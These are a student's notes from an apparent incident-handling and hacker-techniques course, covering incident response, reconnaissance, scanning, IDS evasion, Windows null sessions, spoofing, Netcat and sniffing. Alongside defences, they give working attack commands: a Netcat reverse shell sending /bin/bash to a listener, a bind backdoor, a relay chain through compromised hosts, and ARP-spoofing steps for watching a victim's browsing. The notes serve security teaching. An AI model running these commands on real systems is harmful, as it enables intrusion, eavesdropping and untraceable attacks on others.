Hacker Techniques, Exploits & Incident HandlingNotes written by Uma Mahesh Padisetty

Always have Handwritten Notes

o Whom are you meeting, what did u ask, what commands .

✔ May be have audio recorders with you.

o Sometimes video recordings can have policy obligations.

✔ When you do the job make sure management understands ur value in the form of Incident handling summary i.e., slide of all incidents, here are graphs. For a quite month include info from other or like SANS to avoid budget cuts.

✔ We need to have appropriate people on team should have core experts in all disciplines

o Two from Unix, Two fron windows,

o Network Management Personnnel as we get lot of info from routers and switches

o In house Legal Council

o Sometimes we need HR for taking actions on humans

o Disaster Recovery /BCP should not be head on incident handling.

✔ Have System built checklist i.e., what are the basic system built documents for those servers etc.

✔ Inorder to run the Bridge calls, we need to have list of all contact info of key personnels or emergency calls.

✔ Test your stuff periodically(not regularly..they hate u).

Source of Realworld Incident scenarios www.counterhack.net

CounterHack PPt: http://www.cs.sjsu.edu/~stamp/CS286/ppt/

✔ Incident Handlers sometimes need to have access to device with admin priveleges

o Bargain with Operations Team.

✔ Provide a way to users to contact incident handling team

o Provide hotline number, email source, occasional alert mails.

o We need a special climate controlled room (say SOC)

✔ Always plan for backups for evidences

✔ Helpdesks are important and they are eyes of Incident Handling Team

o Educate helpdesk people to report some specific incident to us.

✔ Incident Response Kit – set of tools

o Have a jump bag of Harddisks to take backups.

o Binay backup softwares – dd and windd

o Netcat – move filysystem images across network, take output of certain commands

o Forensic softwares

Freewares - Sleuthkit, Autopsy

Commercial tools – Guidance software Encase

o Diagnosis software (sometimes a rootkit installed on the machine might lie to you regarding the badguy as rootkit modifies operating system itself. So carry your trustrworthy set of tools on a cd or pendrive for diognosis)

A good bootable Linux Disks – (eg: Helix)

o Use something like Taps to capture. Cant use Hubs,switches

Cannot use on servers

Bad guy can identify as it is bidirectional

Available from NetOptics (USB powered TAP is easy to use)

o Cables (1 straight through, 1 crossover cable, 1 USB to Serial cable, 1 Serial cable for Routers, extra harddrive cable)

o Laptop with multiple operation systems (Atleast virual machines)

✔ Interview the operations people with open ended questions like

what recent changes made the firewall?

what recent configurations?

what patches?

any scripts executed?

✔ Involve your peers into handling the incident and everyone maintain notes.Also involve the necessary people such as adminstrator, business manager, Risk Manager, Client POC, etc.

✔ Network Perimeter Detection

tcpdump -n

✔ Host Perimeter Detection

Firewall Logs

netstat -an

Virus Response Tool Kir (LiveIR)

✔ System Administrator Cheet Sheets (for windows and linux) are some commands that system administrator use to find any anomalies.

Session 2 – Click on PDF Below

sc – services controller, services.msc, msconfig, net view etc.,

at – to check what jobs are scheduled, process explorer from sysinternals

Netcat – To transfer data across TCP and UDP Ports

We have to create a chain of evidences (Collection of events) on document. Eg: when law

enforcement officer asks for harddrive, ask for proof (mail, fax) and then send Copy of the real.

Preparation

Identification

Containment:

o Short term containment: Pause the Attacker temporarily without changing the configurations made by attacker. Ie., Blocking the network, port, Isolate the machine.

Maintain good relation with management sponser who will provide resources, remove blocks across. Management sponser can be LIRM, SDM – Notify him

Coordinate with Network Personnel to isolate the Machine from network. It can be done by pulling the LAN cable from the machine, Blocking the switch port attached to the machine.

Usually Badguys hit with IP address. Change the IP in DNS Servers so that your customers come to your actual service while bad guy try to his the old machine. It helps until we get some information. The Problem is convincing the Management.

Maintain a Low Profile while investigating. Do not do reconnaissance from the infected machine. If needed do from other machine (Lab)

Backup the Machine (Create Images – use DD, WinDD etc from Live CD)How do you deal with filesystems of terabytes of data???Usually such devices has RAID Mirroring. So It has a button to synchronize the mirroring. Here you go., push the button and take itUsing built-in backup softwaresCopy Only system Partition where OS resides and the logs.

Use some Tools for logging the incidents and provide the incident number.Eg: RTIR (Real Time Incident Response) - http://bestpractical.com/rtir/BlackThorn - http://www.qccis.com/blackthorn

o Long term containment and Erradication:

remove/disable accounts

shutdown/remove backdoor

change passwords

Erradication

Recovery

Lessons Learnt

<<checkout the slides>>

Ask Open ended questions. Do not ask yes/no questions.

Espionage: Espionage or spying involves an individual obtaining information that is considered secret or confidential without the permission of the holder of the information.Tip#1: When handling such cases, use trusted people.Tip#2: Try target analysis of our own organization.Tip#3: To generate an event while transferring critical documents, assign a Unique Serial Number in it so that google can bring it up, Use some signature if IDS can identify the transfer..Tip#4: Always have access to various logs, not just Device logs but physical logs such as Datacenter entry login/logout, call record of some person, surveillance videos etc.,

Unauthorized use:Tip#1: Organizational Reconnaissance.

Phone Phishing:In the email, it states that your account has the problem, please call the number to fix It. The number goes to VOIP and phishing IVRS of the bank asking to input account number, pin for authentication.

In Appropriate Web access:Pull the proxy logs.(But do it only if HR asks in writing not the manager asks)Bluecoat, SurfControl etc can block unwanted sites categorized as Pornography, Malware Sources etc

Insider Threat:It could be contractor, business partner, employee.It can be destructive, non destructive (=>doesn’t mean not damaging, they copy and take it out)They might put Logic bombs .Warning Banner helps prevent insider threat. Always get authorization from HR when monitoring suspicious person otherwise might sue you.Ask open ended Questions…

Intellectual Property Theft:Patents: Protect InnovationsCopyrights: Protects specific expressions of ideas, contentTrademarks: Protects Brands

Confusion Attack: Using same fonts, colors to confuse between original and duplicate eg: Microsoft and Microsaft.Tradesecret Protection: Things we derive economic value for them being secret. Provides various penalties for violation. Protecting against Theft.

How to identify breach in intellectual property?To prove the theft and intellectual property violation, we need to show that we made enough protection to it.

Law, Crime and EvidenceThree Domains:

US Federal Law:Title 10 Section 2030: Computer fraud and Abuse Act1) Computers working for govt2)Computers associated with Infrastrucure3)Computer associated with e-commerceThe laws apply only if Damage > $5000

DAY2

Session 1Talks about vulnerabilities, disclosures and complications

Whenever vulnerability is found it is advised to contact vendor and go public when he patches or a timeframe of 90 days (mostly) and even 180 days before going public. If vulnerability found via Reverse Engineering, you could be sued by DMCA Act.

Tipping point will buy the vulnerabilities.

Send the vulnerability via Proxy like US Cert, SANS ISC.

Hactivism: Hacking to make a political point.Create a Malware Create Botnet Rent the Botnet (eg: for Hactivism)

Scarewares, Codecs – Drive by downloads

How does Hacker start attacking?

Reconnaissance

Whois – one can get contact information of the domainFindout Registrar associated with the domainRegistrar would provide detailssometime IP can be block of ips, it can be ISPhttp://yehg.net/lab/pr0js/misc/wsa.phpsometimes when the contact is person, then social engineering can be played on him for reconnaissance.P.s: There are some anonymous registrars who will not put up owners information. This will slow down contacting processDNS Interrogation - Bad guys always want to have as many as records as possible. Zone Transfers – The hackers way to get most out of DNS. It is used to transfer DNS records from Primary NS to Secondary NS. However hackers exploit to collect the DNS Records. There are perl scripts (Found on BT) for DNS Enumeration – DIG can be used for zone transfer

Get the Name Server#dig counterhack.com<<provides the Name server of counterhack.com>>

Ask the Name server about the domain using Protocol AXFR (or IXFR)#dig @ns1.highland-parking.net counterhack.com axfr[As a security feature, most of name servers might disabled it]

Nslookup on windows does the same purpose.Usually organization keeps secondary, teritiary NS with ISP, and whom support ZoneTransfer. Send a mail to ISP to block it.

DNS is highly critical infrastructure and always harden it.

Identification of DNS compromise: Look for Zone Transfer - Normal DNS use UDP 53 while Zone Transfer use TCP 53.Also DNS Reponse Bigger than 512 Bytes.Also DNS Request Bigger than 512 bytes can be an attack for buffer overflow.

Website Searches : Press releases, Job Openings, Business Partners, Phishing attack on employees

Defences:

Preparation:Look at your own websites,

See what your employees talk about in news groupsMake Job opening description generic

Identify web crawler activity from the logs

Google Searches: Johny Lang – Using Google for Penetration Testing

phonebook: James Smith Google Provide phone book search () – provides for US Directory– Search only from this site

site: isc.sans.com Search only from this site

link: wikihead.wordpress.com Shows everything that links to that site

intitle: Honeypot Indepth Search the keywords in the title sometimes the files on the server are listed with title IndexHence “site:domain.com intitle:index”

inurl: robots.txt Search term in the URLs. Helps identifying critical files like shown beside

wikihead –malware-

Discard the term malware from search (minus)

+ Eg: ‘X and Y’ strips out andso use X+and+YX.Y - one character

Google Cache: contain website image from google serversHelps to view deleted contents on the siteP.S: Data in google cache can be removed by using google webmaster tools

Language Translationhttp://translate.google.com

Browse the website using google translator. You can browse anonymously…(not ultimate anonymous)

filetype: pdf Reports only PDF files with given search terms

Ext:rdp Shows rdp files (Remote desktop files)

GHDB – Google Hacking Databaserobots.txt – it lists out what are the files or folder that should not be crawled[Honeypot Use# check the ip who accessed the file mentioned in robots.txt… it is a malicious bot]noindex, noarchive, nosnippet etc written to robots.txt can prohibit google Bot to capture unwanted info on the server.USERAGENT Switcher : A Plugin in Firefox to change the UserAgent of web request.

Google URL Crawl Request Form: Google crawls the site from scratch again from root.

SAMSPADE – A simple tool for whois, dns, tracert etc for reconnaissanceIt has webcrawler. wget –r [Web crawling for local mirroring]

SCANNING

WarDailing: Phone Sweep: Dail the numbers in sequence.NudgeString: Replay a pattern of signal when modem is found (Modem style attack)Remediation: Use modem only if vendor has strong requirement, even if used ask for Strong userid and passwords.Conduct a WarDailing Exercise.

[There are Voice IPS which detects wardailing and blocks the calls to modem if vulnerable]As in IR member, you should have contact with person who can tell you where the phone ends inside the company.

Netstumber: It is a good tool for wardailing tools for Wireless Access Points. If WEP is used, capturing some packets can crack the keys.

AIRCrack-NG: A superb one to crack the WEP keys.

SESSION 2

KARMA - http://www.wirelessdefence.org/Contents/KARMAMain.htmKARMA is a set of tools for assessing the security of wireless clients at multiple layers.

1. It sniffs the 802.11 Probe request packets passively and there by discover clients.2. From the packets, it extracts what network the clients want to connect to (I guess it would

be SSID)3. KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11

Access Point that responds to any probed SSID4. It starts the services ACCESS-POINT, DNS-SERVER, DHCP-SERVER, FTP-SERVER5. When the user wants to connect to internet via ssid, Karma acts as MIM, assign a DHCP ip to

victim and capture all the traffic. It acts as fake DNS, FTP server to capture credentials and returns nothing.

karma-lan.xml - "This configuration runs a  rogue DHCP, DNS and HTTP services on an existing (wired) network connection.  The HTTP service redirects all requests to ExampleWebExploit module that displays simple HTML page"Usage: cd /tools/wifi/karma-20060124bin/monitor-mode.sh  ath0bin/karma  etc/karma-lan.xml

ASLEAP – Exploits Cisco LEAP Protocol http://www.wirelessdefence.org/Contents/AsleapMain.htm

The Lightweight Extensible Authentication Protocol (LEAP) is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows for clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to use TKIP instead of dynamic WEP.

This password is not encrypted and transferred while authenticating, but some complicated hash ..blah.. blah..blah… is transmitted on air for authentication. There is a weakness which is exploited by using dictionary attack against those hashes transmitted to retrieve WEAK PASSWORDS.

A simple defense strategy employed is MAC Filtering at AP… Oh…MAC is spoofable..Just sniff the mac from packets and use when the machine is offline.

WPA2 is Stronger Access Authentication Mechanism

Attacking Aggressive mode IKE which is used for wireless VPN Connection is easily crackableIt takes short cuts to improve performance by avoiding rekeying.IKE Aggressive Mode:In IKE Aggressive Mode the authentication hash based on a prehashed key (PSK) is transmitted as response to the initial packet of a VPN client who wishes to establish an IPSec tunnel. This hash is not encrypted. A packet sniffer (i.e. tcpdump) can be used to capture these hashes and a dictionary or brute force attack can be used against the hash to recover the PSK

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on this fact, we can learn that IKE Aggressive Mode is not very secure.Tool: IKECRACK - http://ikecrack.sourceforge.net/Hence the tip is Disable Aggressive IKEProof Of Concept: http://www.ernw.de/download/pskattack.pdf

Cisco AP has integrated security mechanism and can also assist by jamming the Rogue machine. But it is problematic as it can jam any machines in the vicinity that belong to another company. Mostly Jamming is legally banned and will not be used. I believe other guy can sue you.

There are some WIPS such as AirMagnet, AirDefense

WIRELESS LAN Security Policies

WEP shouldn’t be used Disable Aggressive IKE When Jammers are used, put a sign board notifying the same

<<Working with NETSTUMBLER>>

Is Wardriving with Netstumbler legal?Ans: It depends…..Since it sends BEACONs and receives Responses. Hence it is advised to disable DHCP.Passively sniffing is legally wrong as it might object their privacy.

TIME: 30 MINS complete

Network Mapping: We need to get topologyCheops-NG: http://www.digipedia.pl/man/doc/view/cheops-ng.1/

It is simple tool that provides what are the network mapping by using host discovery and also port discovery on the machines. It uses ping, traceroute for network mappingSending a packet for traceroute with TTL = 1, i get first hop machineSending a packet for traceroute with TTL = 2, we get second hop machineFeatures:

Host discovery - Uses ICMP ping packets Machine fingerprinting to determine OS (using Nmap) - Runs an nmap command to determine

OS fingerprinting. Use of DNS and ICMP to detect network hosts Network mapping - Mapping is done using UDP (or optionally ICMP) packets with small time-to-

live values (traceroute and mtr, respectively)

Usage:

1. First Start the Cheops Agent on the machine #cheops-agent &2. Connect to Cheops-Agent #cheops-ng

3. Enter the IP of the machine on which Cheops-agent is running.. currently it is localhost4. Add Host in the workspace.. just one targetmachine

Recommendations

✔ Usually Corp blocks pings.✔ Also Block outgoing ICMP packets

>>>Simple Details on TCP, UDP Headers<<<Port Scanner – NMAPhttp://www.insecure.org/presentations/Shmoo06/(nmap on windows is not reliable due to non robust TCP/IP stack in windows)

Break: 1:35 Hrs

Defenses

● Disable all ports until there is a business need● periodically check the rule base for its need.

Tools:

Windows:

netstat -a,

netstat -ab --- it lists all details of dlls, process that are connected

TCPView

WMIC (Windows Management Instrumentation Control)

Linux:

LSOF (list open system files) lsof -i -- shows out open connections losf -- lists all the openfiles by all applicationsKILL – kills the processchkconfig – used to manage services to load in each of the runlevels

chkconfig --list [name] chkconfig --add name chkconfig --del name chkconfig [--level levels] name <on|off|reset>Eg: chkconfig –-add xinetd chkconfig -–level 5 xinetd off

Excerise

Do TCP Scan, Decoys, SynStealth Scan, Connect ScanTo check outgoing packets – tcpdump -lio Version ScanningWhy not connect scan with Decoy scan?

Passive Fingerprinting

P0f2

NetworkMiner - http://networkminer.sourceforge.net/It can also pull out files transferred from the dump files, clear text contents in the dumps. Very nice tool

Determining Firewall Rules

✔ Using ICMP instead of UDP for traceroute can reveal info about the devices behind firewall, as they may not be blocked by firewall] #traceroute -I 10.9.23.1

✔ UDP Port 53 is usually unblocked at firewall since it is needed for DNS

queries/responses. Hence we need to fool the firewall. Normal traceroute will increase sourceport monotonically with each hop, and three packets are delivered to each hop. So inorder to send a packet that has port 53 at firewall, we have to set the initial port number as TargetPort – (number_of_hops * number_of_probes) – 1I.e., 53 – (8 * 3) – 1 = 23 [suppose number of hops before reaching gateway is 8] #traceroute -p28 10.9.23.1This will only give about device just after gateway only..:(Instead, stop the incrementation

#traceroute -S -p53 20.9.23.1

Layer Four Traceroute (lft)

It determines what packets are allowed through the firewall.

Firewalk - http://packetstormsecurity.org/UNIX/audit/firewalk/firewalk-0.99.1.tar.gz

It employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. Firewalk the tool employs the technique to determine the filter rules in place on a packet forwarding device. In order to use a gateway’s response to gather information, we must know two pieces of information:

• The IP address of the last known gateway before the firewalling takes place

• The IP address of a host located behind the firewall.

Using Proxy Servers, can eliminate FirewalkingSome NIDS, also detect firewalking.2:28 PM – Vulnerability scanning

These Vulnerability scanners detect only known vulnerabilities and do not identify zero-day vulns. Hence it is always advised to have multiple layers of security. As an exercise Just take the topology of DMZ and believe that one machine is compromised by zero-day vulnerability. Then think of the solution.

Nessus

They generate huge reports, which is hard to understand. It also donot do correlation, cross correlation.

Nessus has Plugins, where each plugin tests one test on the target environment

NASL (Nessus Attack Scripting Language) – is used to create plugins

Architecture:

Nessus Client communicates with Nessus Daemon Server that tells to do the scan.

NessJ – A java based nessus client that provides in understandable format

Dangerous Plugin – can cause damage to end system.(Like DOS based plugins for checking vulns)

1. Install Nessus2. Create a certificate

#nessus-mkcert3. Add User

#nessus-adduser 4. Start Nessus Server Daemon

#nessusd -D5. Start the Nessus Client

#nessus6. Nessus GUI is displayed, Login and start the scan7. It is advaised to run updates periodically

#nessus-update-plugins

WebApp Scanner

They knew about known CGI vulnerabilities, Active server page vulnerabilities etcEg: Awstat vulnerabilities, phpBB vulnerabilities

Nicto WebApp Scanner – A free tool written in perl.

It will look for CGI files for vulnerabilities It looks into robots.txt It has port scanner It has application level IDS Evasion Supports Web Authentication supports ssl, it has mutation functionality

Victo – a similar tool with GUI that includes Goolge Hacking DB support.

IDS Evasion

Packet Fragmentation – technique is used to evade detection

In the Ip Header,

DF bit – Dont FragmentMF bit – More fragments are comingFragement Offset – used for reassemblyIP ID value is used to assemble the fragmentsHowever, wireline IDS are detecting these attacks using Virtual Packet Reassembly Buffers.Unfortunately, Wireless IDS are not detecting fragmented packets, and can easily pass through.

Sending Small Packet fagments (Session Splicing) Pause sending fragments so that IDS timeout but not the host machine Overlapping Fragments - For example, the first packet will include 80 bytes of payload but the

second packet's sequence number will be 76 bytes after the start of the first packet. When the target computer reassembles the TCP stream, they must decide how to handle the four overlapping bytes. Some operating systems will take the older data, and some will take the newer data.

FragRouter Some IDS gives you option to block fragmeted packets? Although not recommended. Check out before blocking.

r Runs on Unix/Linux systems

r Provides over 35 different schemes for fragmenting flow of data

r Separates attack functionality from the fragmentation functionality

Some Fragmentation Types,

r Sends data in ordered 8-byte fragments

r Sends data in ordered 24-byte fragments

r Sends data in ordered 8-byte fragments with one fragment out of order

r Complete TCP handshake, send fake FIN and RST (with bad checksums) before sending data in ordered 1-byte

Obfuscating attack payloadSend the data such that IDS cannot understand but victim Machine can understand. Viz., Using Unicode encoding, Attacking via HTTPS (Usually backdoors planted by attacker work under https)

Inserting Traffic at the IDS

Send the traffic such that IDS only see and determine state for a machine, but the packet actually doesn’t reach end machine. I.e., by sending a RST packet with less TTL value so that it expires after reaching IDS. Also sending a packet with bad checksum so that end machine will discard.

Gaining Windows Data through Null Sessions [Enumeration]

Most powerful account on the machine – system [not Administrator]A null session is an anonymous request comes such that I am nobody, coming from nowhere and please give me some dataWith a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information. These techniques can, and will provide information on passwords, groups, services, users and even active processors. NULL session access can also even be used for escalating privileges and perform DoS attacks.Usually Information Enumerated by Intruders

Network Resources and Shares User Accounts and Groups Applications

Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the Null user ---Just check out for open ports on your machine 139, 445 which are netbios ports, almost 90% of machines have them open.

Sample Hack using NetBIOS Null Session:

1. Impacket Samrdump - an application that communicates with the Security Account Manager Remote interface from the DCE/RPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.

bt smb-enum # samrdump.py guest:''@192.168.1.104 139/SMBRetrieving endpoint list from 192.168.1.104Trying protocol 139/SMB...Found domain(s):. YOUR-O1N9OY17SK. Builtin

2. DumpSec – It dumps information about system users, file system, registry, Permissions, Password Policy and services

3. Enum – A simple console based tool that can be used in scripts #enum –u --- Lists users #enum –g --- Lists Groups #enum –s --- Lists shares #enum –p --- Lists Password Policy

C:\> enum –D –u <username> -f <dictionary> dictionary is a file containing list of passwords which can be obtained from any password cracking toolDownlink for windows: http://www.indianz.ch/tools/scan/enum.zip

4. WinFingerprint

Having Established a Session

We can use tools like rpcclient to execute RPC command on the client machine.

Defense: Change the Registry Entry Restrict Anonymous to 0x02

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA [ Default: 0x01 ]

Drop the packets destined for port 135-139, 445

Day 3Spoofing

SniffingMac FloodingArp spoofingSession HijackingDNS PoisoningBuffer OverflowsFormat String Attacks & Exploits

Spoofing

Decoy scans with Nmap are examples of spoofingThey are done to exploit trust relationship, to pass through ACLs, DOS attacks, to avoid logging attacker traces.

1. Change IP Address2. TCP Guessing3. Source Routing

On Unix, source ip can be changed via ifconfigOnWindows, it can be changed via Network control panel or net sh

Change IP AddressTools: Nemesis – It presents like TCP/IP stack, we you fill the data and it crafts the packetsHping2Netdude – I can read the pcap files and graphically represent the communication. Here we can edit the connection settings etc., and save the capture. Now we are ready for Reply Attack.

Now the Problem is How do you go with TCP 3 way handshake with spoofing? The receiver sends SYN/ACK to spoofed address, wherein he sends back RST. So whats the use?

Spoofing is useful for UDP kind of Attacks

TCP GuessingMitNick Attack to create 3 way handshakePrior to launch attack sample as many packets as from Admin Server and do statistical analysis to predict Sequence Number.

1) Disable Admin2) Send spoofed SYN packet3) Send spoofed ACK packet with predicted Sequence number4) From Target machine perpective, it has established a tcp connection to admin5) Now execute a command “Please add attacker to rchosts file.6) Now attacker can directly authenticate with Target Machine

Source Routing

Defences1. Make TCP Sequence number highly random i.e., always apply patch from vendor if it belong to

TCP stack 2. Be careful with Trust Relationships (rlogin, rsh). It is advised not to extend trust relationship

beyond the firewall. Since it’s recommended to allow trust relationship between machines having same level of control, threat and security. Also having firewall we can block the intruding attempts.

3. Authentication should not be based on IP Address. I.e., if you say allow only this ip to pass through to DMZ… Lol..it is spoofable. Hence use some other authentication mechanism like username password, VPN etc.,

4. Replace remote commands like rlogin, rsh, telnet and ftp with SSH.5. Some Legacy systems might not work with ssh etc. In that case, Use another machine a hop

prior to legacy machine. Connect to the machine in a secure fashion and then use rlogin, rsh to the legacy system

6. Anti Spoof Filters at firewalls Eg: If I see a packet with SIP 20.*.*.* from this interface, Drop it7. Enable Unicast Reverse-Path Forwarding Check on Routers

It check its routing table for source address and incoming interface to determine whether packet is coming from path that sender would use to reach destination.

8. No Source Routing, No IP directed Broadcast at Border Gateways.Identification

1. Make sure Anti Spoof Filters generate log when they detect spoofing. Usually Log analyzers such as Envison will collect logs from firewalls etc shows up these alerts

2. IDS Sensors that look at ip addresses that do not belong here.

Containment1. Identify the machine and remediate.

NetCat - http://h.ackack.net/cheat-sheets/netcat

It reads and writes data across network connections, using TCP or UDP Protocol.

1. Netcat Client Mode --It initiate connections2. Netcat Server(Listen) Mode -- It listens on the tcp/udp port

Command Options Descriptionnc –l Listen Modenc Client Modenc –L Listen Persistently

When listening normally using nc –l, it waits for connection. Once established and client terminates the connection, Listen mode is also dropped. Where as in Persistent listen mode, even if client terminates the Conn, it’s still listening.

nc -u UDP mode, if no –u it is tcpnc –p In Listen mode, It is listen on that local port 80

In client mode, it sends data from source port 80 (Local)nc –e Execute a program after connection has occuredNc –z Zero IO, no data transfer, only tcp connection estd, may send UDP packetsnc –w <sec > Wait for connection, Eg: nc –w 3 waits for 3 seconds for connection before it is

teared down.Even if connection is made and no data for 3 sec, it will go off.nc –vv Very Verbose

It can be used to transfer files on tcp/udp ports Port scanning, Banner grabbing A Small vulnerability scanner – what vulnerable services running on target Backdoor Relay

Suppose we want to do port scanning, It is a good idea to use port 80,443 so as to evade detection.Also its better to scan ports in a random fashion using –r switch

C:\>nc –v –r 192.168.12.1 1-100

Now connection is established… Whatever you type at client will be visible at server and viceversa.

Transferring IO (Even Files)We need to use < > | to redirect IO between connections

C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 < readme.txt

Now readme.txt is transferred to another machine listening on port 17876

Backdoor

Not only just input, it can bind an executable on some port specified

On Server,C:\Mahesh\Tools\NetCat>nc -lvvp 17876 -e calc.exelistening on [any] 17876 ...DNS fwd/rev mismatch: localhost != RedPC

On Client,C:\Mahesh\Tools\NetCat>nc -vv localhost 17876DNS fwd/rev mismatch: RedPC!= localhostRedPC [127.0.0.1] 17876 (?) open

Now at client, Calculator has popped up.

Backdoor 2 (Reverse Shell)

Creating a listening shell with Netcat is a valuable technique but in orderfor this technique to be effective the attacker needs to be able to send datato the port on which Netcat is listening. This can pose a problem if there isa router or firewall in the path blocking inbound traffic as you will not beable to reach the listening port. We can also send commands to server to execute

Attacker: Server is listening for connection C:\>nc -lvvp 4444listening on [any] 4444 ...

Victim: Client sends the terminal to server

BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash 192.168.0.198: inverse host lookup failed: Unknown (UNKNOWN) [192.168.0.198] 4444 (krb524) open

Alice: After Connection – Ready to take commands

It is suggested to use Netcat instead of Telnet when you find any open port on any machine bcoz Netcat is fast and telnet use telnet control sequences which might blowup some applications running on end machine.

Replay Attack

From the pcap file, we can strip off headers and save the content only to a file and transfer to target machine using netcat. Eg; If we have transaction command “TRANSFER 1000$ from Acc A to Acc B”, replay it.

Relay – When you attack victim, be untraceable..

Hackers use relays which are located at least in 5 locations which are geographically distant and has bad political relationship. Eg: To attack USA, start with relay at China India Pakistan Israel Ukraine.

1 Attacker first compromises Relay 1 and Relay 22 Configure a Relay with Netcat Listen on one Port and Netcat Client to forward to another

Relay on another port.

Attacker: C:\>nc <Relay1> 4321Relay1:

C:\> nc –L –p 4321 | nc <Relay2> 4321Relay2:

C:\> nc –L –p 4321 | nc <Target> 4321

NOW, We have established a one-way channel from attacker to Target

Target:C:\>nc –L –p 4321

<<Not Clear Look into it>>

1:17

Defending Against Netcat

Prevent Netcat file transfers Firewall configuration issue Secure against port scanning Minimal number of listening ports Block arbitrary connections to ports Close unused ports [Open port should have

justification] Protect against vulnerability scanning Apply patches Backdoors Need to know what processes are running so you can detect rogue processes Prevent relay attacks No single point that attacker can relay around Stop persistent listeners Periodically check for unexpected listening ports

ExcersizeCreate Backdoor, Create RelayScneraio: You are sitting outside firewall that blocks inbound access but allow outbound packets.How do get outside access to listener inside?

SNIFFING

Wireshark – It can parse many protocolsSniffit – It can be used in interactive mode sniffit –ii.e., its ability to handle the interactive sniffing of sessions in real time.Attacker can directly see what the victim is doing in real time sniffing the session

These tools only works for Passive Sniffing (Parsing packets coming on to the NIC) and hence work in Hub environment

Active Sniffing – Injects the packet into network so as to sniff in Switched Environment

DSniff – A collection of tools for network auditing and penetration testing.

Foiling Switches Using ARP Spoofing [Arpspoof] - Over an Ethernet, data is transferred using frames containing Source and Destination MAC addresses. The Destination Mac address is identified by sending ARP Request

A Machine upon ARP Reply Packet, (irrespective of whether ARP Req sent or not)

Machine updates ARP Cache (Mapping of IP to MAC Addr)

1. So If victim host receives a ARP Reply packet containing valid destination ip (A router/server etc) and attackers MAC Address… hoila…victims machines has been Poisoned.

2. Configure your machine with IP Forwarding (If the packet is not destined for your mac, forward to Default Gateway)IP Forwarding on Linux - echo 1 > /proc/sys/net/ipv4/ip_forward[TTL is decremented, as an investigator if we can identify if Initial TTL and TTL value has extra decremented, need to look into]

Practically ARPs can be used for good, such as Failover cases, ARP the router to failover machine.

Foiling Switches using Flooding the Switch [Macof] –

1. Send Ethernet frames with spoofed MAC address to the switch so that MAC Address Table on the Switch is filled and no more entries can be loaded

2. Now Some switches goes to either Denial of Service state delivering no packets or Hub state delivering packets across all the interfaces of the switch.

Additional Tools with DSniff,

TcpKill Kills active TCP connections

When there is a telnet connection, you can break the connection by sending RST Packet to both ends. Now sniff while re authentication to gather Credentials

Tcpnice Inject ICMP source quench Message to slow down the traffic

FileSnarf Capture the Transferred Files

MailSnarf Grabs e-Mails sent using SMTP and POP

MsgSnarf Grabs messages sent using AOL Instant Messenger, ICQ, Internet Relay Chat, and Yahoo! Messenger

URLSnarf Grabs the URL visited

WebSpy Using the URLs captured from the network, displays the pages viewed by the victim on the attacker's browser. Essentially, Webspy lets the attacker look over the victim's shoulder as the victim surfs the Web. Webspy is quite useful for demos to managementHTTPS don’t work

Things that have auth using cookies etc., may or may not work

Excerise - WebSpying on a Victim

1. Enable IP forwarding [ or use FragRouter with no fragmentation ]# echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP Poisoning on Victim and Gateway

#arpspoof –i eth0 –t 192.168.1.5 192.168.1.1 [Poison the Target using Gateway IP]

#arpspoof –i eth0 –t 192.168.1.1 192.168.1.5 [Poison the Gateway for Target IP]

Now you are MIM.

3. Use WebSpy to grab the Browser traffic [IE and Netscape]

#webspy –i eth0 192.168.1.5 [Spy on the target IP traffic]

4. Start Browser from Command line

#firefox &

5. Now you can see what victim Is browsing.

Just a Tip: If possible try to have proxy logging UserAgent Types in Webtraffic. We can identify malware infected machine and traffic.

DNSSpoof

WEBMITM (Web Monkey in the Middle) - It acts as proxy.

After DNS Spoofing, the victim comes to you for the service he is trying. Eg: He want to go to Banking site www.abcbank.com, DNSSpoof running on attacker machine sends spoofed DNS Response to victim claiming it is the abcbank.com. Now user come to you.

Now you have to either phish the site or proxy the site.

The problem with above is Certificate Errors. Victim is presented with Attackers Certificate but not the abcbank.com certificate which will warn the users that somebody is pretending to be you bank.

The Top Warning box can be avoided by having a signed certificate from CA.

Second Warning Box is caused due to the fact that the browser will notice that the DNS name in the certificate does not match the name of the Web site that the user is trying to access A careful attacker can make sure the name on the certificate matches the domain name of the Web server, but a legitimate, trustworthy Certificate Authority should never sign such a bogus certificate of someone impersonating a bank

Unfortunately, most users just click yes..yes..yes to establish ssl connection with untrusted site.

Same works for ssh also

Defences

system administrators, network managers, and security personnel understand and use secure protocols to conduct their job activities

networks containing very sensitive systems and data, enable port-level security on your switches i.e. Bind the MAC address to a Port using Port Security.

For Extremely sensitive networks like Internet DMZs, use static ARP tables on the end machines, hard-coding the MAC address to IP address mapping for all systems on the LAN. Takes extra overhead when changing NIC components.

Identification

On the suspect Unix machine, ifconfig the word PROMISC is there, it is listening On Windows, use PromiscDetect, another free tool at

http://ntsecurity.nu/toolbox/promiscdetect To detect from Remote, use Sentinal that tests using EtherARP, EtherPing and DNS tests

to identify. o EtherARP – send a ARP Req to suspect IP with bogus MAC, if Response received it

is listeningo EtherPING – same as ARP, but it uses ICMP ping. If it doesn’t sniff it should not

see ping.o DNS Test – Send a DNS req, and check if any othermachine doing Reverse DNS of

that website

ContainmentIf detected on one machine, it can be present on another machine

EradicationCheck for Rootkits and identify the process that is listening in promiscuous mode

RecoveryMonitor the attacker activity, as he is likely to use the information gathered by sniffing

Day 3 Session 2

Session Hijacking

Tools:o Hunto Dsniff --- sshmitm o Ettercap o Juggernauto IP Watcher, TTYWatcher, TTYSnoop

Network-based session hijackingo Combines spoofing and sniffingo Alice and Bob have existing connectiono Trudy is sniffing packets (on LAN)o Trudy starts injecting packetso Bob thinks packets came from Alice

This works even if strong authentication used, provided there is no encryption

ACK Storm

